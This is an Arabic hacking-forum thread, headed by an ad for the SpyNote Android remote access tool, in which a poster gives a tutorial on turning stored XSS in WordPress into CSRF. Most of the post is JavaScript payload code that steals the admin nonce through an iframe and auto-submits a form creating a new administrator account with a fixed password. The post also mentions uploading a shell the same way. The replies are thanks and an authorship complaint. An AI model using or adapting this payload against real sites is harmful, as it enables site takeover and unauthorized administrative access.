1. SpyNote v5.0 Android Remote Administration Tool
    النسخة تعمل من API 10 الى API 25 اضافات واصلاحات عديده
    خصائص البيلدر مهمه جدا في ثبات الاتصال قرائة الموضوع

[ شرح ] Advanced XSS Part 1

الموضوع في 'آمن المواقع والسيرفرات' بواسطة a7mdrat, بتاريخ ‏17 نوفمبر 2013.

كاتب الموضوع : a7mdrat المشاهدات : 973 الردود : 5 ‏17 نوفمبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    a7mdrat
    rank
    Developer

    عضو منذ:
    ‏7 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    [​IMG]
    الموضوع عن الاستغلال المتفدم لثغرات xss
    و عدم الاكتفاء بالطريق التقليدية لسحب الكوكيز

    نوع من انواع الاستغلال المتقدم هو التحويل من xss الى CSRF

    و المقصود هنا تقدر تعمل اي شئ كانك داخل اللوحة

    و للتجرية اخترت سكربت وردبريس

    لان اغلب الناس لما تجد xss تقول ثغرة مالها لزمة


    xss اخطر انواع الثغرات خصوصا stored

    اذا ان الادمن نفسه ينفذ الكود في متصفحه
    يعني تخطي مشاكل الجدار الناري ......

    نترك الكلام و نأتي للتطبيق

    موضوع اليوم عن add admin wordpress via xss

    اولا ناتي الى طريقة كتابة الاستغلال

    هناك عدة طريق نشرحها وحدة وحدة

    الطريقة الاولى:
    0-امور مساعدة
    1- قرات التوكن عن طريق xss
    2- انشاء فورم عن طريق javascript و التنفيذ


    0-
    ننصب السكربت على المحلي


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    ندخل اللوحة عادي
    ثم ننشأ ملف html ونكتب الاستغلال داخله
    اول شئ وهو عمل iframe يسحب صفحة اضافة الادمن وهي على المسار

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    كود PHP:
    <script>
      
    document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
    </script>

    ثم حفظ الملف باسم massacreur.html
    بدخل الملف

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    1- قرات التوكن عن طريق xss

    الان نبحث على input التوكن
    كود PHP:
    <input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="79b9646aef" />

    كود جافا سكربت بسيط لسحب التوكين

    كود PHP:
    <script>
    document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
     function 
    loadz() {
      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 
    alertwptoken); 
    }
     
    </script>
    الان معنا التوكن

    2- انشاء فورم عن طريق javascript و التنفيذ

    نقوم نتكوين form اضافة ادمين + ارسال

    نسحب form صفحة اضافة ادمن ثم ننزع الاشياء الغير مهمة المتعلقة بال css و structure de la page html

    نترك الاساسي فقط

    يصبح هكذا

    massacreur.html
    كود PHP:
    <script>
      
    document.writeln('<iframe id="iframe" onload="loadz()" src="http://127.0.0.1/wordpress/wp-admin/user-new.php"></iframe>');  
      function 
    loadz() {
      eval (
    "var wptoken=document.getElementById('iframe').contentDocument.getElementsByTagName('input')[1].value"); 
      
    document.writeln('<iframe><form id="bd" action="http://127.0.0.1/wordpress/wp-admin/user-new.php" method="post" name="bd" id="createuser" class="validate">');
      
    document.writeln('<input name="action" type="text" value="createuser" />');
      
    document.writeln('<input type="text" id="_wpnonce_create-user" name="_wpnonce_create-user" value="'+wptoken+'" />'); 
      
    document.writeln('<input type="text" name="_wp_http_referer" value="http://127.0.0.1/wordpress/wp-admin/user-new.php" />'); 
      
    document.writeln('<input name="user_login" type="text" id="user_login" value="massacreur" aria-required="true" />');
      
    document.writeln('<input name="email" type="text" id="email" value="webservers@hotmail.fr" />');
      
    document.writeln('<input name="last_name" type="text" id="last_name" value="massacreur" /></td>'); 
      
    document.writeln('<input name="url" type="text" id="url" class="code" value="massacreur" />');
      
    document.writeln('<input class="text" value=" " />');
      
    document.writeln('<input name="pass1" type="text" id="pass1" autocomplete="off" value="toxico" />');
      
    document.writeln('<input name="pass2" type="text" id="pass2" autocomplete="off" value="toxico" />');
      
    document.writeln('<input type="text" value="send_password" name="send_password" id="send_password"  />'); 
      
    document.writeln('<input type="text"  name="role" id="role"  />'); 
      
    document.writeln('<input name="role" id="role" value="administrator">'); 
      
    document.writeln('<input id="submit" class="button button-primary" type="submit" value="Add New User " name="submit">');
      
    document.writeln('</form>'); 
      
    document.forms[0].submit.click(); 
      
      }  
    </script>
    وفي الاخير

    نحذف

    <script></script>

    ونغير الامتداد الى

    .js

    هذه احد الطرق

    هناك طرق اكثر فعالية
    سوف اشرحها في يوم من الايام ان شاء الله


    يمكنك اضافة ادمين او رفع شل من كانك داخل اللوحة
    اسئلة و اضافات و نقاشات جادة لوسمحتم
    الطريقة ليست بالجديد لكن لم اجد لها شروحات منقول للامانه bye1~`

     


    جاري تحميل الصفحة...
  2. غير متصل

    مخابرات الهكر
    rankrank
    Developer

    عضو منذ:
    ‏19 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Advanced XSS Part 1

    جزاكم الله خيراً ,أخي العزيز

    موضوع رائع
     


  3. غير متصل

    D 1 r k
    DeveloPer Plus

    عضو منذ:
    ‏9 ابريل 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:
    الوظيفة:
    Currently Student
    الإقامة:

    رد: Advanced XSS Part 1

    بارك الله فيك أخى الغالى
     


  4. غير متصل

    Dear.DZ
    rank
    Developer

    عضو منذ:
    ‏22 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: Advanced XSS Part 1

    الله يبارك بيك اخي الغالي
     


  5. غير متصل

    T H E P U N I S H E R .:: أداري أقسام التصميم والجرافيكس ::.
    مشرف

    عضو منذ:
    ‏29 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,274
    نقاط الجائزة:
    الإقامة:

    رد: Advanced XSS Part 1

    بآرك الله فيك آخي الغالي​
     


  6. غير متصل

    massacreur
    rank
    Developer

    عضو منذ:
    ‏24 ابريل 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: Advanced XSS Part 1

    قبل لا تنقل الموضوع حرفيا المرة الجاية قم بالاستاذان اولا
    يخي عباد يخي
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...